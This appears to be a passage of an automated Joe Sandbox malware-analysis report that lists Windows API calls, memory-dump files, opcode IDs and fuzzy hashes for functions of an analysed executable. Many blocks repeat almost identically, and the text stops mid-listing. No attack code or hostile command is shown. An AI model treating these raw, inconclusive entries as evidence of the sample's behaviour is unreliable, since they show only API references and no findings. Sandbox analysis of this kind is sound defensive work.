                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 167328d109b35d822396555ff930f173c6c76dd5d69912e14b855c436e2b5712
                    • Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
                    • Opcode Fuzzy Hash: 167328d109b35d822396555ff930f173c6c76dd5d69912e14b855c436e2b5712
                    • Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c450ff22135144d9d26b7f672a7c9ac2e8a5de03136f2100c53e6adc4325ce6a
                    • Instruction ID: 1ce5319efe9ec8a2af34937893fda803d74e8246334bce1f8608564be16cb95f
                    • Opcode Fuzzy Hash: c450ff22135144d9d26b7f672a7c9ac2e8a5de03136f2100c53e6adc4325ce6a
                    • Instruction Fuzzy Hash: 09A001D66A9103BE76086662BD9BD3A029DC5D8BA1330C9BAF56A850A2A9809C45103A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 35a5e6f98a31daaf0a5ebd5940183ebc10ea29ea85d3b3e1f2c3bd674a1c5094
                    • Instruction ID: 2d5089bd8a88f7b4ef9d04bbf13b5a950b5fa4f5d06627ca1c702090e821d9cd
                    • Opcode Fuzzy Hash: 35a5e6f98a31daaf0a5ebd5940183ebc10ea29ea85d3b3e1f2c3bd674a1c5094
                    • Instruction Fuzzy Hash: D1A011C22A80023E32082A22BE8BC3A028EC0C0B20330C0BAF028800A2A8808C00003A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 0dc3aeeb4e0cab64eac1efb4ea970be32350dec0f038ba9110bd3cc9fb492b94
                    • Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
                    • Opcode Fuzzy Hash: 0dc3aeeb4e0cab64eac1efb4ea970be32350dec0f038ba9110bd3cc9fb492b94
                    • Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 2f43478df4a763fbf125b4620778848808c56edcec326fa462a54ef5301fdf16
                    • Instruction ID: 2ebb9d5c038ba79c8624de1e075517bb94b12ed037a243f95f356c6c274eca39
                    • Opcode Fuzzy Hash: 2f43478df4a763fbf125b4620778848808c56edcec326fa462a54ef5301fdf16
                    • Instruction Fuzzy Hash: 56A001962A9202BD760866666DDBD3A129DD8C0B25330C9BAF52994092A8805D851079
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 8a113862e41ca28ff7498d4557cc9a79c0b559c8181e240768bc552501685565
                    • Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
                    • Opcode Fuzzy Hash: 8a113862e41ca28ff7498d4557cc9a79c0b559c8181e240768bc552501685565
                    • Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 018732fa960947048a9bfc9fd8e11b53b6b9d9419898a5a6976f32b684c9e68e
                    • Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
                    • Opcode Fuzzy Hash: 018732fa960947048a9bfc9fd8e11b53b6b9d9419898a5a6976f32b684c9e68e
                    • Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 6e60e6c680de02c1594bab70c27730ae5af98c953dfe58703219b1596d3a3dbc
                    • Instruction ID: 7eeaf37b03972a001dfc9491853405cd8b516d529d6334646acb4690dba4c54c
                    • Opcode Fuzzy Hash: 6e60e6c680de02c1594bab70c27730ae5af98c953dfe58703219b1596d3a3dbc
                    • Instruction Fuzzy Hash: 81A001962BD103BD760862626D9BD3A029DC4C8B65730C9BAF52A940A2A8819C456539
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 6b8371a8c8b8afb31fca6a7088795b2a605ba5d40c42fe508d6d3eebb9b0cb19
                    • Instruction ID: f0dce188adba874971d77bc873e26860bcbd89ce0b12ed4efe2e2f503eb2b299
                    • Opcode Fuzzy Hash: 6b8371a8c8b8afb31fca6a7088795b2a605ba5d40c42fe508d6d3eebb9b0cb19
                    • Instruction Fuzzy Hash: 68A001962AD203BD760866666D9BD3A129DC8C4B61330C9BAF52A84092A8805D851079
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F70C
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d1ffc409b674af3b2040a5c26261b12df737e8b0b857f4566768997b8aa63b99
                    • Instruction ID: f0dce188adba874971d77bc873e26860bcbd89ce0b12ed4efe2e2f503eb2b299
                    • Opcode Fuzzy Hash: d1ffc409b674af3b2040a5c26261b12df737e8b0b857f4566768997b8aa63b99
                    • Instruction Fuzzy Hash: 68A001962AD203BD760866666D9BD3A129DC8C4B61330C9BAF52A84092A8805D851079
                    APIs
                    • SetEndOfFile.KERNELBASE(?,00B6A083,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,00B6922F,-00008BE0), ref: 00B6B19C
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: File
                    • String ID:
                    • API String ID: 749574446-0
                    • Opcode ID: 5b4388c82397679db57f9ff21daf35b2e8d72366043da14066d31f5cb7378b88
                    • Instruction ID: 45f4f8e0bc0ce1cdb890b5bf81dd956d77a242c79e291702c38822a02fd8573e
                    • Opcode Fuzzy Hash: 5b4388c82397679db57f9ff21daf35b2e8d72366043da14066d31f5cb7378b88
                    • Instruction Fuzzy Hash: 78A0223008000E8BCE002B32EF0880C3B20FB22BC830002E8A00BCF0B2CF23882BCB00
                    APIs
                      • Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
                      • Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350
                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B7D4B1
                    • EndDialog.USER32(?,00000006), ref: 00B7D4C4
                    • GetDlgItem.USER32(?,0000006C), ref: 00B7D4E0
                    • SetFocus.USER32(00000000), ref: 00B7D4E7
                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B7D521
                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B7D558
                    • FindFirstFileW.KERNEL32(?,?), ref: 00B7D56E
                      • Part of subcall function 00B7BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC3F
                      • Part of subcall function 00B7BC2B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B7BC50
                      • Part of subcall function 00B7BC2B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B7BC5E
                      • Part of subcall function 00B7BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC6C
                      • Part of subcall function 00B7BC2B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B7BC87
                      • Part of subcall function 00B7BC2B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00B7BCAE
                      • Part of subcall function 00B7BC2B: _swprintf.LIBCMT ref: 00B7BCD4
                    • _swprintf.LIBCMT ref: 00B7D5B7
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B7D5CA
                    • FindClose.KERNEL32(00000000), ref: 00B7D5D1
                    • _swprintf.LIBCMT ref: 00B7D620
                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B7D633
                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B7D650
                    • _swprintf.LIBCMT ref: 00B7D683
                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B7D696
                    • _swprintf.LIBCMT ref: 00B7D6E0
                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B7D6F3
                      • Part of subcall function 00B7C093: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B7C0B9
                      • Part of subcall function 00B7C093: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BA072C,?,?), ref: 00B7C108
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                    • String ID: %s %s$REPLACEFILEDLG
                    • API String ID: 3464475507-439456425
                    • Opcode ID: e205cbc838877c14a49b8275be7ebc1803579ea89950b2cc424d5d484c93ff39
                    • Instruction ID: 199a47c230edd5d4b3b81300587a294b21b2752abaeedecf1123dc1ea356cf15
                    • Opcode Fuzzy Hash: e205cbc838877c14a49b8275be7ebc1803579ea89950b2cc424d5d484c93ff39
                    • Instruction Fuzzy Hash: 6F71E272148304BBE231ABA4DC89FFB77ECEF8A740F044859F69DD2081DA75A9048762
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B80A16
                    • IsDebuggerPresent.KERNEL32 ref: 00B80AE2
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B80B02
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00B80B0C
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 89430aa7418dbdb4c0cd54406a648560ab915ff51d6298bffde35c85c9d86166
                    • Instruction ID: 95153c9a37a144f54d0640c48dd0cc77423575aa9ae43adc586b0c00cef8afa7
                    • Opcode Fuzzy Hash: 89430aa7418dbdb4c0cd54406a648560ab915ff51d6298bffde35c85c9d86166
                    • Instruction Fuzzy Hash: 08313A75D012199BDB20EFA4D989BCDBBF8EF08304F1041EAE408A7260EB715A85CF44
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B67AB4
                    • _wcslen.LIBCMT ref: 00B67B1D
                    • _wcslen.LIBCMT ref: 00B67B8E
                      • Part of subcall function 00B68704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B68713
                      • Part of subcall function 00B68704: GetLastError.KERNEL32 ref: 00B68759
                      • Part of subcall function 00B68704: CloseHandle.KERNEL32(?), ref: 00B68768
                      • Part of subcall function 00B6B470: DeleteFileW.KERNELBASE(?,00000000,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B481
                      • Part of subcall function 00B6B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B4AF
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B67C43
                    • CloseHandle.KERNEL32(00000000), ref: 00B67C5F
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B67DAB
                      • Part of subcall function 00B6B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B67ED0,?,?,?,00000000), ref: 00B6B04C
                      • Part of subcall function 00B6B032: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B6B100
                      • Part of subcall function 00B6A880: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B6A83D,?,?,?,?,?,00B9380F,000000FF), ref: 00B6A89B
                      • Part of subcall function 00B6B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA
                      • Part of subcall function 00B6B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                    • API String ID: 2821348736-3508440684
                    • Opcode ID: fd4aed73be76327f22f49a6dbea065f0dbfc291a4c40ca02e720918f385740f2
                    • Instruction ID: 4d54e3bd35e629578fa4a184c45baffedfdf810b82dc88ce291406292176ad30
                    • Opcode Fuzzy Hash: fd4aed73be76327f22f49a6dbea065f0dbfc291a4c40ca02e720918f385740f2
                    • Instruction Fuzzy Hash: 35C1E671944205AADB21DB64CC86FEEB7ECEF04318F1445EAF545E7242DF38AA44CBA1
                    APIs
                    • _swprintf.LIBCMT ref: 00B6F62E
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                      • Part of subcall function 00B730F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BA3070,?,00B6EC48,00000000,?,00000050,00BA3070), ref: 00B73112
                    • _strlen.LIBCMT ref: 00B6F64F
                    • SetDlgItemTextW.USER32(?,00BA0274,?), ref: 00B6F6AF
